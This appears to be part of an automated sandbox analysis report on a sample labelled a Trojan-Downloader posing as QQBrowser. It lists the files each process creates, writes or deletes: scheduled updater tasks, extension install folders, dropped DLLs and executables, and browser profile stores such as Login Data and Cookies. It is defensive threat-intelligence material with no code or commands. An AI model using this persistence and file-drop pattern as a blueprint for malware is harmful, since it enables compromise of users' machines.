%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\DECODED_MESSAGE_CATALOGS (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\manifest.json (606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\background.html (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\DECODED_IMAGES (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\searchbar_ipad.css (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\searchbar_ipad.js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\background.js (3 bytes)
The process QQBrowser.exe:2944 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%WinDir%\Tasks\QQBrowser Updater Task(Core).job (310 bytes)
%WinDir%\Tasks\QQBrowser Updater Task.job (306 bytes)
The process QQBrowser.exe:1968 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\background.html (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\DECODED_MESSAGE_CATALOGS (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\DECODED_IMAGES (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\48.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\word_search.js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\word_search.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\manifest.json (665 bytes)
The process QQBrowser.exe:3472 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\QB\QQBrowserConfig.dat (114 bytes)
The process QQBrowser.exe:3028 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\LastCheckTime (18 bytes)
The process QQBrowser.exe:2888 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\CRX_INSTALL\style.css (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\CRX_INSTALL\manifest.json (464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\DECODED_IMAGES (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\DECODED_MESSAGE_CATALOGS (24 bytes)
The process QQBrowser.exe:1252 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\it\messages.json (622 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\vi\messages.json (720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_bQat1WAHZ2iP4DW (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension State\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ca\messages.json (705 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\zh_TW\messages.json (640 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Storage\chrome-extension_pafkbggdmjlpgkdkcbjmhmfcdpncadgh_0.localstorage-journal (5545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\fil\messages.json (692 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\bookmark.qbl (1927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10.tmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\F.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sv\messages.json (649 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension State\000003.log (2005 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Top Sites-journal (7056 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\uk\messages.json (789 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\bg\messages.json (886 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\nl\messages.json (642 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sl\messages.json (642 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\CRX_INSTALL\manifest.json (797 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Web Data (23757 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2D.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11.tmp (51528 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Login Data (2706 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension Rules\MANIFEST-000001 (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\hr\messages.json (633 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Shortcuts-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\EncryptedStorage (974 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\D.tmp (840 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\2B.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\12.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Web Data-journal (10522 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension State\LOG (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_KVGYNR2SKf1cluv (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\nb\messages.json (644 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\48.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cookies-journal (5308 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\data_3 (1736 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\data_2 (2600 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\data_1 (57080 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\data_0 (366156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_8Ll8pVklSMihImC (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\switch_core_manual-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\data_reduction_proxy_leveldb\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_qUc0Jyb2V9rYcxY (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000005 (101 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\1A.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000007 (33 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000006 (80 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000001 (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_RkpE6WcOaDfQtj6 (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000003 (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\14.tmp (54772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\14.tmp (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\CRX_INSTALL\manifest.json (862 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\en\messages.json (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\26.tmp (3479 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1\iniC.tmp.qbl (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1D.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\11.tmp (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\lv\messages.json (699 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\switch_core (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\zh_CN\messages.json (595 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\lt\messages.json (686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_ZIkdiixhmGgAbyE (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\en_GB\messages.json (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh\000003.log (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\switch_core_manual (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\27.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\el\messages.json (875 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Quick Links-journal (52413 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\index (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\28.tmp (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\fr\messages.json (708 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\icon_128.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\es_419\messages.json (667 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_XOTzPqgqOMDnkaA (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Visited Links (836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ja\messages.json (778 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh\MANIFEST-000001 (75 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\hi\messages.json (941 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh\LOG (218 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sr\messages.json (814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\th\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\es\messages.json (696 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\History (39278 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\25.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\data_reduction_proxy_leveldb\LOG (189 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\E.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\id\messages.json (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Favicons-journal (31194 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\da\messages.json (642 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\26.tmp (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Favicons (12598 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\et\messages.json (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\pl\messages.json (666 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\2E.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\fi\messages.json (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\28.tmp (22828 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\de\messages.json (701 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension State\MANIFEST-000001 (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ru\messages.json (783 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000004 (47 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\hu\messages.json (710 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\cs\messages.json (663 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1\sso-f1.zip.qbl (259728 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Quick Links (59841 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Top Sites (3588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12.tmp (2631 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Shortcuts (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000002 (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\icon_16.png (556 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\2A.tmp (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\EncryptedStorage-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Storage\chrome-extension_pafkbggdmjlpgkdkcbjmhmfcdpncadgh_0.localstorage (299 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension Rules\000003.log (511 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\2C.tmp (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ko\messages.json (669 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\F.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\History-journal (39124 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\data_reduction_proxy_leveldb\MANIFEST-000001 (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_l9L1ZczXTKrKKpE (322 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\10.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1\QQBrowserOTA.exe (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sk\messages.json (671 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\1B.tmp (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension Rules\LOG (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\pt_PT\messages.json (661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1C.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\29.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\tr\messages.json (650 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension Rules\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cookies (1043 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\22.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Login Data-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\18.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\19.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\pt_BR\messages.json (667 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\2F.tmp (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\manifest.json (982 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ro\messages.json (668 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\CRX_INSTALL\manifest.json (795 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Current Session (1147 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\bak\Bookmarks.20160519101458.bak (1 bytes)
The Trojan-Downloader deletes the following file(s):
The process QQBrowser.exe:2364 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\CRX_INSTALL\manifest.json (390 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\CRX_INSTALL\QBFixerForGJ.exe (32104 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\CRX_INSTALL\QBFixerPlugin.dll (21288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\DECODED_IMAGES (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\DECODED_MESSAGE_CATALOGS (24 bytes)
The process QQBrowser.exe:2852 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\background.js (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\DECODED_MESSAGE_CATALOGS (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\manifest.json (599 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\game-iframe.js (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\background.html (91 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\DECODED_IMAGES (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_9127\CRX_INSTALL\video-iframe.js (1 bytes)
The process QQBrowser.exe:2764 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\CRX_INSTALL\QQPCDetector.dll (43024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\DECODED_MESSAGE_CATALOGS (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\CRX_INSTALL\manifest.json (395 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\DECODED_IMAGES (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\CRX_INSTALL\GJTipsPlugin.dll (20400 bytes)
The process QQBrowser.exe:2836 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%System%\WIWFg4kt8m.log (2 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\Common\gjdatareport.dll (76 bytes)
The Trojan-Downloader deletes the following file(s):
%System%\WIWFg4kt8m.log (0 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\Report.Ini (0 bytes)
The process QQBrowser.exe:4064 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\Cab23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}\qrx13.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab20.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Tar21.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Cab1E.tmp (0 bytes)
The process QQPCDownload8889533.exe:1584 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~82cd5\setup.xml (588 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\QQPCMgr_Setup.exe (3323635 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (684 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~82cd5\QQPCDownload.kui (1741 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~82cd5\QQPCDetector.dll (5257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~82cd5\QQPCDownload.dll (9775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~82cd5\qmdr\dr.dll (75 bytes)
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (0 bytes)
The process j3lx7ew39.exe:2960 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):
The Trojan-Downloader deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\PepperFlash\manifest.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\PrScrn.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\driver\amd64 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\natives_blob.bin (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\ExportFavHtml.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\locales (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\xaml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\dbghelper\dbghelp.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\webp\WebpDecodeFilter.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\switch_core (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\dbghelper (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\F1Assistant.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\libGLESv2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\dbghelper\dbgeng.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\compat.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\QRCode.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\Default (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\ModuleDll\{0508DF1F-2AB6-4fac-A99E-45BBBF24E1E6}.qrx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\Config.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\service\TsService.exe.new (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\qqbrowser.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\CustomerJoinPlan.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\uninst.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\chrome_child.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\bin\Downloader.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\12au8967c\appdata\xaml\PicCheckDialog.xaml (0 bytes)
